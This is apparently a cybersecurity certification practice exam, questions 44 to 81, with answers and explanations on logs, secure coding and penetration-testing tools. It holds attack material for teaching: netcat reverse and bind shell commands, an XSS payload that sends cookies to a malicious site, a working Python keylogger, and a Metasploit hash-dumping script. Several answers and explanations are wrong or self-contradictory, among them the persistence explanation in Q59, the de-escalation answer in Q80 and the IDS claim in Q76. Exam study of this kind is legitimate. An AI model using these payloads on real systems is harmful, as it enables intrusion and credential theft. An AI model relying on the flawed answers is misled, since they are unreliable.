-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- J an 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this log entry, which of the following statements are true?

A.The packet was blocked inbound to the network

B.MAC filtering is enabled on the firewall

C.Packets are being blocked inbound to and outbound from the network

D.An attempted connection to the telnet service was prevented

E.The packet was blocked outbound from the network

F.An attempted connection to the ssh service was prevented

Answer 44

A.The packet was blocked inbound to the network

D.An attempted connection to the telnet service was prevented

Explanation: OBJ-3.2: Firewall log formats will vary by vendors, but this example is a commonly used format from the Linux iptable firewall tool. This log starts with the date and time of the event and provides some key pieces of information. For example, the word “drop” shows the action this log entry recorded. In this case, the firewall dropped a packet due to an ACL rule being applied. You can also see that the packet was detected on the inbound connection over eth0, so we know that packets are being scanned and blocked when they are headed inbound to the network. Next, we see the MAC address of the source device of the packet, the source (SRC) IP address, and the destination (DST) IP address. Further down, we see the source (SPT) and destination ports (DPT). In this case, the DPT is 23 and is a well-known port for telnet. Based on this single log entry, we cannot tell if packets are also being blocked when they are attempting to leave the network or if they are blocking connections to the ssh service (port 22) is also being conducting.

Question 45

You are conducting a static code analysis of a Java program. Consider the following code snippet:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- String custname = request.getParameter(“customerName”); String query = “SELECT account_balance FROM user_data WHERE user_name = ? “; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the code above, what type of secure coding practice is being used?

A.Input validation

B.Session management

C.Authentication

D.Parameterized queries

Answer 45

D.Parameterized queries

Explanation OBJ-3.4: A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the “parameters” (think “variables”) that need to be inserted into the statement for it to be executed. It’s commonly used as a means of preventing SQL injection attacks. This code snippet is an example of a Java implementation of a parameterized query. Input validation would involve the proper testing of any input supplied by a user to an application. Since the first line takes the custname input without any validation, this is not an example of the input validation secure coding practice. Session management refers to the process of securely handling multiple requests to a web-based application or service from a single user or entity. Authentication is the act of proving an assertion, such as the identity of a computer system user. This code snippet is neither a form of session management nor authentication. You should not fully understand what this code is doing for the exam, but you should understand what it is not doing. There is nothing in the code that indicates session management or receiving usernames and passwords. Therefore, we can rule out session management and authentication. This leaves us with input validation and parameterized queries as our best options. Based on the code, we see the word query multiple times, which should be a hint that the answer is a parameterized query even if you can’t read this Java code fully.

Question 46

As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve information about an organization’s network infrastructure without causing an IPS alert. Which of the following is his best course of action?

A.Perform a DNS brute-force attack

B.Use a nmap ping sweep

C.Perform a DNS zone transfer

D.Use a nmap stealth scan

Answer 46

A.Perform a DNS brute-force attack

Explanation: OBJ-3.2: The best course of action is to perform a DNS brute-force attack. The DNS brute-force attack queries a list of IPs and typically bypasses IDS/IPS systems that do not alert on DNS queries. A ping sweep or a stealth scan can be easily detected by the IPS, depending on the signatures and settings being used. A DNS zone transfer is also something that often has a signature search for it and will be alerted upon since it is a common attack technique.

Question 47

Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?

A.Phishing

B.Zero-day

C.Spear phishing

D.SPoofing

Answer 47

C.Spear phishing

Explanation OBJ-3.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

Question 48

Which of the following secure coding best practices ensures a character like < is translated into the < string when writing to an HTML page?

A.Session management

B.Output encoding

C.Error handling

D.Input validation

Answer 48

B.Output encoding

Explanation OBJ-3.4: Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the < string when writing to an HTML page. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID.

Question 49

A security analyst conducts a nmap scan of a server and found that port 25 is open.

What risk might this server be exposed to?

A.Open file/print sharing

B.Web portal data leak

C.Clear text authentication

D.Open mail relay

Answer 49

D.Open mail relay

Explanation OBJ-3.2: Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

Question 50

A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

]>
&abc;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the output above, which of the following is true?

A.An XML External Entity (XXE) vulnerability has been exploited and its possible that the password has downloaded the file /etc/passwd

B.There is no concern since /etc/passwd does not contain any system passwords

C.ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used

D.The application is using parameterized queries to prevent XML injections

Answer 50

A.An XML External Entity (XXE) vulnerability has been exploited and its possible that the password has downloaded the file /etc/passwd

Explanation OBJ-3.4: This is an example of an XML External Entity (XXE) vulnerability. Any references to document abc of type xyz may now be replaced with /etc/passwd, which would allow the user to harvest the data contained within the file. Although in modern Linux operating systems, the /etc/passwd only contains the usernames resident on the system and not the passwords, this is still valuable information for an attacker. The ‘/etc/passwd’ file has been better secured in recent systems by using a shadow file (which contains hashed values for the passwords). Without an input validation step is added to the process, there is nothing to stop the attacker from gathering other potentially sensitive files from the server. While ISO-8859-1 does indeed cover the Latin alphabet and is standard throughout XML, it has no significance from a cybersecurity perspective. A parameterized query is a form of output encoding that defends against SQL and XML injections. This code does not contain a parameterized query.

Question 51

You are conducting a static analysis of an application’s source code and see the following: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(String) page += “”;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this code snippet, which of the following security flaws exists in this application?

A.Race condition

B.Improper input validation

C.Improper error handling

D.Insufficient logging and monitoring

Answer 51

B.Improper input validation

Explanation OBJ-3.4: Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of “ID”: ‘>document.location= ‘http://www.malicious-website.com/cgi-bin/cookie.cgi? Foo=’+document.cookie’. This could cause the victim ID to be sent to “malicious-website.com” where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer.

Question 52

Your company has several small branch offices around the country, but you work as a network administrator at the centralized headquarters building. You need the capability of being able to remotely access any of the remote site’s routers to configure them without having to fly to each location in person. Your company’s CIO is worried that allowing remote access could allow an attacker to gain administrative access to the company’s network devices. Which of the following is the MOST secure way to prevent this from occurring while still allowing you to access the devices remotely?

A.Create an out-of-band management network

B.Install an out-of-band modem

C.Configure the remote routers ACLs to only permit Telnet traffic

D.Configure the remote routers ACLs to only permit HTTP traffic

Answer 52

A.Create an out-of-band management network

Explanation OBJ-5.3: You should create an out-of-band management network using an SSH (console) connection to the router. Telnet and HTTP are not encrypted channels and should not be used for remote connections. Using a modem is also a bad security practice since these are subject to war dialing and provide slow connectivity speeds.

Question 53

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?

A.IPS

B.WAF

C.Vulnerability scanning

D.Encryption

Answer 53

B.WAF

Explanation: OBJ-5.3: WAF (web application firewall) is the best option since it can serve as a compensating control and protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protected network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.

Question 54

What SCAP component could be to create a checklist to be used by different security teams within an organization and then report results in a standardized fashion?

A.XCCDF

B.CCE

C.CPE

D.CVE

Answer 54

A.XCCDF

Explanation OBJ-5.1: XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results. The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. The Common Configuration Enumeration (CCE) provides unique identifiers to system configuration issues to facilitate fast and accurate correlation of configuration data across multiple information sources and tools. Common Platform Enumeration (CPE) is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets.

Question 55

Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the email’s malicious link is not being blocked by the company’s security suite when a user clicks the link. Susan asks you what action can be performed to prevent a user from reaching the website associated with the phishing email’s malicious link. What action do you recommend she utilize?

A.Block the IP address of the malicious domain in your firewalls ACL

B.Add the malicious domain name to your content filter and proxys blacklist

C.Enable TLS on your organizations mail server

D.Forward the phishing email to all employees with a warning not to click on the embedded links

Answer 55

B.Add the malicious domain name to your content filter and proxys blacklist

Explanation OBJ-5.3: To prevent a user from accessing the malicious website when the link is clicked, the malicious domain name should be added to the blacklist of the company’s content filter and web proxy. This will ensure that no devices on the network can reach the malicious domain name. While blocking the IP address associated with the domain name might help for a short period of time, the malicious domain’s owner could quickly redirect the DNS to point to a different IP. Then the users would still be able to access the malicious domain and its contents. Enabling TLS on the mail server will only encrypt the connection between the email server and its clients. Still, it will not prevent the users from clicking on the malicious link and accessing the malicious content. While informing the users that there is an active attempt at phishing being conducted against the organization is a good idea, forwarding the phishing email with the malicious link will generally cause more users to accidentally click on the malicious link, which further exacerbates the issue.

Question 56

During a penetration test, you identify a critical vulnerability in a client’s production Linux-based Apache webserver. Which of the following should you do NEXT?

A.Exploit the vulnerability, escalate privileges and patch the vulnerability as root

B.Enter “sudo apache2 stop” to prevent an attacker from exploiting the server

C.Complete the engagement and notify the client in the executive summary of the report

D.Pause the engagement and notify the client using established communication paths

Answer 56

D.Pause the engagement and notify the client using established communication paths

Explanation OBJ-5.4: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

Question 57

What document typically contains high-level statements of management intent?

A.Procedure

B.Guideline

C.Standard

D.Policy

Answer 57

D.Policy

Explanation OBJ-1.2: Policies are high-level statements of management intent. Compliance with policies by employees should be mandatory. An information security policy will generally contain broad statements around the various cybersecurity objectives. Procedures describe exactly how to use the standards and guidelines to implement the countermeasures that support the policy. Standards and baselines describe specific products, configurations, or other mechanisms to secure the systems. A guideline is a recommendation that can specify the methodology that is to be used.

Question 58

You are reviewing a rule within your organization’s IDS. You see the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any msg: “BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt”; flow: to_client,established; file_data; content:”recordset”; offset:14; depth:9; content:”.CacheSize”; distance:0; within:100; pcre:”/CacheSize\s*=\s*/”; byte_test:10,>,0x3ffffffe,0,relative,string; max-detect-ips drop, service http; reference:cve,2016-8077; classtype: attempted-user; sid:65535;rev:1; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this rule, which of the following malicious packets would this IDS alert on?

A.A malicious inbound TCP packet

B.Any malicious outbound packets

C.A malicious outbound TCP packet

D.Any malicious inbound packets

Answer 58

A.A malicious inbound TCP packet

Explanation OBJ-3.2: The rule header is set to alert only on TCP packets based on this IDS rule’s first line. The flow condition is set as “to_client,established,” which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established. Therefore, this rule will alert on an inbound malicious TCP packet only when the packet matches all the conditions listed in this rule. This rule is an example of a Snort IDS rule. For the exam, you do not need to create your own IDS rules, but you should be able to read them and pick out generic content like the type of protocol covered by the signature, the port be analyzed, and the direction of flow.

Question 59

You are working as part of a penetration testing team during an engagement. A coworker just entered “sudo systemctl start DionTrainingApp” in the shell of a Linux server the team exploited.

What action is your coworker performing with this command?

A.To enable persistence on the server

B.TO enumerate the running services on the server

C.To remove persistence on the server

D.TO shutdown the running service on the server

Answer 59

A.To enable persistence on the server

Explanation OBJ-3.7: This scenario uses the systemctl command to remove persistence from a Linux server within its shell. The systemd tool is an init system and system manager that has widely become the new standard for Linux distributions. The systemctl is part of systemd. The systemctl is used to manage services, check their status, change their status, and work with the configuration files. By entering “sudo systemctrl start DionTrainingApp” in the shell, the system will start the service known as DionTrainingApp. This will create persistence by running the DionTrainingApp service, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

Question 60

What is the term for exploiting a weakness in a user’s wireless headset to compromise their smartphone?

A.Multiplexing

B.Zero-day attack

C.Smurfing

D.Bluejacking

Answer 60

D.Bluejacking

Explanation OBJ-3.3: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, or laptop computers.

Question 61

You are conducting a physical penetration test against an organization. You followed an employee to the coffee shop next door, and while they were ordering, you got within 1 foot of them to electronically capture their proximity badge. Which of the following exploits are you planning to use?

A.Session hijacking

B.Bluesnarfing

C.RFID cloning

D.Credential harvesting

Answer 61

C.RFID cloning Explanation: OBJ-3.3: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object’s physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge’s microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without actually stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You simply hold the badge up to the RFID writer device, press a button to copy its tag’s data, then hold a blank badge up to the device and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.

Question 62

You are logged into the Windows command prompt and want to find what systems are alive in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?

A.ping 172.16.0.0

B.ping 172.16.0.255

C.for %X in (1 1 255) do PING 172.16.0.%X

D.for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /l “Reply”

Answer 62

D.for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /l “Reply”

Explanation OBJ-4.4: The Windows command line does support some fundamental scripting, as shown in this answer. Use an iterative variable to set the starting value (start#) and then step through a set range of values until the value exceeds the set ending value (end#). /L will execute the iterative by comparing start# with end#. If start# is less than end#, the command will execute. When the iterative variable exceeds end#, the command shell exits the loop. You can also use a negative step# to step through a range in decreasing values. For example, (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence (5 4 3 2 1). The syntax is: “for /L %variable in (start# step# end#) do command [CommandLineOptions].”

Question 63

Which of the following commands should be run on an attacker’s system to create a reverse shell?

A.nc -lp 31337

B.nc 192.168.1.53 31337 -e /bin/sh

C.nc -lp 31337 -e /bin/sh

D.nc 192.168.1.53 31337

Answer 63

A.nc -lp 31337

Explanation OBJ-4.3: A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command “nc -lp 31337” on it. To connect to the attacking machine from the victim machine, you would enter the command “nc 192.168.1.53 31337 –e /bin/sh” on it. A bind shell is established when a victim system “binds” its shell to a local network port. To achieve this using netcat, you should execute the command “nc -lp 31337 -e /bin/sh” on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command “nc 192.168.1.53 31337” to connect to the victim’s bind shell.

Question 64

A coworker sent you the following Python script to use during an upcoming engagement for Dion Training’s corporate network: -=-=-=-=-=- import pyHook, sys, logging, pythoncom, datetime log_file = ‘C:\Windows\Temp\log_diontraining.txt’ def KbrdEvent(event): logging.basicConfig(filename=log_file, level=logging.DEBUG, format=’%(message)s’) chr(event.Ascii) logging.log(10, chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = KbrdEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() -=-=-=-=-=- During the upcoming engagement, what should you use this script to perform?

A.Scheduling

B.Keylogging

C.Collecting logs

D.Debugging an exploit

Answer 64

B.Keylogging

Explanation OBJ-4.4: This simple Python script is only 11 lines in length, but it creates an effective keylogger. The function (OnKeyboardEvent) is defined to log any ASCII characters receive on the keyboard of the user’s computer. It will save all of this information to a file in the C:\Windows\Temp\ directory for later exfiltration by the penetration tester.

Question 65

It is your first day as a penetration tester at a new job. Your boss provides you with a brand new laptop running Kali Linux. You log in and need to start up Metasploit to begin working. What command do you enter in the bash prompt?

A.msfvenon

B.db_init

C.msfconsole

D.db_connect

Answer 65

C.msfconsole

Explanation OBJ-4.3: The Metasploit Framework is a command-line-based penetration testing framework developed by Rapid 7 that is included with Kali Linux, and that enables you to find, exploit, and validate vulnerabilities. Metasploit also has GUI-based commercial and community versions. To start up the program, type “msfconsole” at the bash prompt in Kali Linux since the program is already installed by default.

Question 66

Which tool would allow you to identify the target’s operating system by analyzing the TCP/IP stack responses?

A.nmap

B.dd

C.scanf

D.msconfig

Answer 66

A.nmap

Explanation OBJ-4.2: The nmap tool can identify the target’s operating system by analyzing the TCP/IP stack responses. Identification of the operating system relies on differences in how operating systems and operating system versions respond to a query, what TCP options they support, what order they send the packets in, and other details that, when combined, can provide a unique fingerprint for a given TCP stack.

Question 67

You are working as part of a penetration testing team targeting Dion Training’s wireless network.

Which of the following tools should you use to gather information about their wireless network?

A.WHois

B.Burp suite

C.BeEF

D.Kismet

Answer 67

D.Kismet Explanation OBJ-4.2: Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. It can monitor wireless activity, identify device types, and capture raw packets for later password cracking. Whois is a protocol that queries databases that store registered users or assignees of an Internet resource, such as a domain name. YASCA (Yet Another Source Code Analyzer) is an open-source SAST program that inspects source code for security vulnerabilities, code quality, and performance. Burp Suite is an integrated platform included for testing web applications’ security by acting as a local proxy so that the attacker can capture, analyze, and manipulate HTTP traffic. BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers and can be used for XSS and injection attacks against a website.

Question 68

You want to exploit the NETBIOS name service on a Windows-based network.

Which of the following tools should you use?

A.Arpspoof

B.Nessus

C.John the Ripper

D.Responder

Answer 68

D.Responder

Explanation OBJ-4.2: Responder provides a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS (NETBIOS), POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords. Responder is configured to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the client’s protocol, thus harvesting the user’s credentials.

Question 69

Which of the following open source tools a penetration tester to conduct vulnerability scans against a company’s infrastructure?

A.Peach

B.Wireshark

C.OpenVAS

D.CeWL

Answer 69

C.OpenVAS

Explanation OBJ-4.2: OpenVAS (Open Vulnerability Assessment System) is an open-source software framework for vulnerability scanning and management that can scan for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks. Wireshark is an open-source network protocol analyzer used to sniff many traffic types, re-create entire TCP sessions, and capture copies of files transmitted on the network. Peach is a dynamic application security testing tool used to conduct fuzzing. CeWL is a Ruby app that crawls websites to generate word lists that can be used with password crackers such as John the Ripper.

Question 70

A coworker sent you the following snippet of a Ruby script to use during an upcoming engagement for Dion Training’s corporate network:

-=-=-=-=-=- if client.platform == ‘windows’ db_ok = client.framework.db.active client.core.use(“priv”) if not client.respond_to?(“priv”) client.core.use(“incognito”) if not client.respond_to?(“incognito”) hashes = client.priv.sam_hashes addr = client.sock.peerhost print_good “Working…” hashes.each do |hash| data = {} data[:host] = addr data[:port] = 445 data[:sname] = ‘smb’ data[:user] = hash.user_name data[:pass] = hash.lanman + “:” + hash.ntlm data[:type] = “smb_hash” data[:active] = true print_line “ Extracted: #{data[:user]}:#{data[:pass]}” client.framework.db.report_auth_info(data) if db_ok end -=-=-=-=-=-

During the upcoming engagement, what should you use this script to perform?

A.Network enumeration

B.Credential harvesting

C.Proxying a connection

D.Establishing a bind shell

Answer 70

B.Credential harvesting

Explanation: OBJ-4.4: This snippet of a Ruby script comes from the Metasploit framework as part of its credcollect.rb script. Most of the meterpreter scripts in Metasploit are written in Ruby, as it quickly became one of the favorite languages of penetration testers. Even if you cannot read and understand this entire script, you should identify some keywords and phrases to guess the correct answer. For example, line 6 mentions sam_hashes, which is used in Windows authentication. The script then extracts the data from the sam_hases for each username and password it could find and stores it in the client (Metasploit) database. For the exam, you need to read a script and understand its basic workflow and functions.

Question 71

Consider the following file called firewall.log that contains 53,682 lines that logged every connection going into and out of this network. The log file is in the following data format, as shown below with the first two lines of the log file: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- DATE,FACILITY,CHAIN,IN,SRC,DST,LEN,TOS,PREC,TTL,ID,PROTO,SPT,DPT Jan 11 05:33:59,lx1 kernel: iptables,INPUT,eth0,10.1.0.102,10.1.0.1,52,0x00,0x00,128,2242,TCP,2564,23 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following commands would display all of the lines from the firewall.log file that contain the destination IP address of 10.1.0.10 and a destination port of 23?

A.grep “10.1.0.10,” firewall.log | grep “23$”

B.grep “10.1.0.10\,” firewall.log | grep “23”

C.grep “10.1.0.10\,” firewall.log | grep “23$”

D.grep “10.1.0.10,” firewall.log | grep “23”

Answer 71

C.grep “10.1.0.10\,” firewall.log | grep “23$”

Explanation OBJ-4.4: The easiest way to do this is with a grep command. In Linux, you can chain together commands by piping data from one command’s output to serve as the input to another command. In this scenario, you can use grep to find all the lines with the IP address first. Then, you can use the second grep command to find all the lines using port 23. The result is a smaller, filtered list of events to analyze. When using the dot in the IP addresses, you must remember to escape this character. Otherwise, grep treats it as a special character in a regular expression treated as any character (except a line break). Adding the \ before the dot (.), grep treats it simply as a dot or period. You must also escape the comma for it to be processed properly. The $ after the port number is used to indicate that the number should only be counted as a match if it is at the end of the line. This ensures that we only return the destination ports (DPT) matching 23 and not the source port (SPT).

Question 72

Which of the following commands should be run on an attacker’s system to create a bind shell?

A.nc -lp 31337

B.nc 192.168.1.53 31337 -e /bin/sh

C.nc -lp -e /bin/sh

D.nc 192.168.1.53 31337

Answer 72

D.nc 192.168.1.53 31337

Explanation OBJ-4.3: A bind shell is established when a victim system “binds” its shell to a local network port. To achieve this using netcat, you should execute the command “nc -lp 31337 -e /bin/sh” on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command “nc 192.168.1.53 31337” to connect to the victim’s bind shell. A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command “nc -lp 31337” on it. To connect to the attacking machine from the victim machine, you would enter the command “nc 192.168.1.53 31337 –e /bin/sh” on it.

Question 73

Which of the following tools provides a penetration tester with a framework to conduct technical social engineering attacks like phishing against an organization’s employees?

A.Kismet

B.SET

C.Proxychains

D.Censys

Answer 73

B.SET

Explanation OBJ-4.2: SET (Social Engineer Toolkit) is an open-source penetration testing framework included with Kali Linux that supports the use of social engineering to penetrate a network or system. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Censys is a search engine that returns information about the types of devices connected to the Internet.

Question 74

Which of the following commands should be run on a victim’s system to create a bind shell?

A.nc -lp 31337

B.nc 192.168.1.53 31337 -e/bin/sh

C.nc -lp 31337 -e/bin/sh

D.nc 192.168.1.53 31337

Answer 74

C.nc -lp 31337 -e/bin/sh

Explanation OBJ-4.3: A bind shell is established when a victim system “binds” its shell to a local network port. To achieve this using netcat, you should execute the command “nc -lp 31337 -e /bin/sh” on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command “nc 192.168.1.53 31337” to connect to the victim’s bind shell. A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command “nc -lp 31337” on it. To connect to the attacking machine from the victim machine, you would enter the command “nc 192.168.1.53 31337 –e /bin/sh” on it.

Question 75

Which of the following tools provides a penetration tester with the ability to mask their identity and source IP address by sending messages through intermediaries?

A.Powersploit

B.Responder

C.Empire

D.ProxyChains

Answer 75

D.ProxyChains

Explanation: OBJ-4.2: Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

Question 76

A new piece of malware attempts to exfiltrate user data by hiding the traffic and sending it over a TLS-encrypted outbound traffic over random ports.

What technology would be able to detect and block this type of traffic?

A.Intrusion detection system

B.Application-aware firewall

C.Stateful packet inspection

D.Stateless packet inspection

Answer 76

B.Application-aware firewall

Explanation OBJ-5.3: A Web Application Firewall (WAF) or Application-Aware Firewall would detect both the accessing of random ports and TLS encryption and identify it as suspicious, whereas Stateless would inspect port number used by the traffic leaving. IDS only analyzes incoming traffic. Therefore it would not be able to see this activity as suspicious.

Question 77

Dion Training is concerned with the possibility of a data breach causing a financial loss to the company.

After performing a risk analysis, the COO decides to purchase data breach insurance to protect the company in an incident.

Which of the following best describes the company’s risk response?

A.Avoidance

B.Transference

C.Acceptance

D.Mitigation

Answer 77

B.Transference

Explanation OBJ-5.1: Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Acceptance means that no countermeasures are put in place either because the risk level does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

Question 78

A network technician is tasked with designing a firewall to improve security for an existing FTP server on the company network and is accessible from the Internet.

The security personnel are concerned that the FTP server is compromised and is possibly being used to attack other company servers.

What is the BEST way to mitigate this risk?

A.Add an outbound ACL to the firewall

B.Change the FTP server to a more secure SFTP

C.Use implicit deny of the firewall

D.Move the server to the company’s DMZ

Answer 78

D.Move the server to the company’s DMZ

Explanation OBJ-5.3: The DMZ is the subnetwork of a network that hosts public-facing servers and has additional security mitigations in place.

Question 79

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it.

The IT team is concerned about the appliance receiving the necessary updates.

Which of the following mitigations should be performed to minimize the concern for the appliance and updates?

A.Configuration management

B.Vulnerability scanning

C.Scan and patch the device

D.Automatic updates

Answer 79

B.Vulnerability scanning

Explanation OBJ-5.3: The best option here is vulnerability scanning as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could be a possible solution. These are not viable options without gaining administrative access to the appliance. Therefore, the analyst should continue to conduct vulnerability scanning of the device to understand the risks associated with it and then make recommendations to add additional compensating controls like firewall configurations, adding a WAF, providing segmentation. Other configurations outside the appliance to minimize the vulnerabilities it presents.

Question 80

You are working as part of a 5-person penetration testing team conducting a compliance-based assessment of Dion Training’s e-commerce server.

During your team’s daily standup, you heard that 4 of the team members were planning on conducting vulnerability scans at the same time as you were scheduled to perform a stress test.

You are worried that this may overload the server and may negatively impact the client’s production servers.

You have recommended that you reschedule your stress test to occur after the vulnerability scans are completed to prevent overloading the production server.

Which of the following BEST describes what you did?

A.Situational awareness

B.De-escalation

C.Goal reprioritzation

D.De-confliction

Answer 80

B.De-escalation

Explanation OBJ-5.4: Communication amongst the penetration testing team members is crucial to ensure that the engagement is successful and doesn’t negatively impact the client. This scenario is an example where too many testers were focused on the same system concurrently. This can lead to a debilitating breach or a denial of service to the client’s network and servers. By conducting the stress tests after the vulnerability scans, you have de-escalated the effects of conducting them simultaneously. This is not a goals reprioritization since the engagement’s overall goals were not changed, and all goals would be achieved during the engagement.

Question 81

Dion Training is worried about the security of the data on their corporate smartphones if lost or stolen. The Chief Security Officer has instructed that the devices be configured so that unauthorized users cannot access the data. Which TWO of the following settings would provide the BEST security and protection for the corporate smartphones’ data?

A.Require complex passwords

B.Configure the ability to perform a remote wipe

C.Enable a pattern lock

D.Enable device lockout after 3 failed attempts

E.Enable full device encryption

F.Disable the installation of the application

Answer 81

B.Configure the ability to perform a remote wipe

E.Enable full device encryption

